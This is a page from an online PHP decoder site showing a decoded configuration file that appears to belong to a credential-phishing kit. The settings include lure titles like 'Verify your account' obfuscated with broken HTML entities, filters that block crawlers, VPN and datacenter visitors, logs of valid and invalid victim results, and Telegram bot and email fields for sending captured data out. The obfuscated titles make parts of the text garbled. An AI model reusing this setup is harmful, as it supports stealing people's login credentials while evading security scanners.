Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

 $config = array("key" => '', "password" => '', "sendtype" => "1", "autograb" => "0", "selection" => "1", "onetimeuse" => "0", "background" => "default", "custom_background" => "365.png", "bot" => array("crawler" => "1", "datacenter" => "1", "vpn" => "1", "proxy" => "1", "abuser" => "1", "bot_abuser" => "1"), "files" => array("valid" => "page/result/valid.json", "invalid" => "page/result/invalid.json", "visit" => "page/result/visit.json"), "telegram" => array("active" => false, "chat_id" => '', "bot_token" => '', "twofactor" => false), "email" => array("active" => false, "email" => ''), "captcha" => array("active" => false, "publickey" => '', "sitekey" => '', "score" => ''), "cloudflare" => array("active" => false, "cloudsitekey" => '', "cloudpublickey" => '', "cloudinvisible" => "0"), "title" => array(0 => "Vriy&#;ou&14; &#;cc&11;unt", 1 => "&#;eri&02;&#;yu id�t&;", 2 => "V&;rif&21;&#;&;&2;cental", 3 => "&#;e&14;i&02;&#;y&#;�&02;o&14;	ati&10;&;", 4 => "Vei&#;&21;&11;&17;r &;	al", 5 => "V&01;&05; &21;&17;&14; o", 6 => "Confirm&#;y&17;r&#;acc&11;&17;n", 7 => "Cofi	 &#;i&00;eiy", 8 => "&7;&11;�f&14;m&2;y&; c&01;&01;nta&15;", 9 => "&7;nf&05;rm u&#;�mai&11;&;", 10 => "Cn&05;&14;m&2;yo&17;r emai&08;", 11 => "&7;o&10;fm&2;o&14;&#;&08;o&10;", 12 => "&#;&05;i�&#;o &14;&2;acc&;n", 13 => "Cnec&16; &;r &#;ccnt"), "grablogo" => "1", "finalredirect" => "", "template" => "default", "lock_email" => array("active" => false, "list" => "page/log/email.txt"), "unchecked_countries" => array(), "unchecked_devices" => array(), "first_message" => "default", "custom_firstmessage" => NULL, "folder" => "admin"); return $config;

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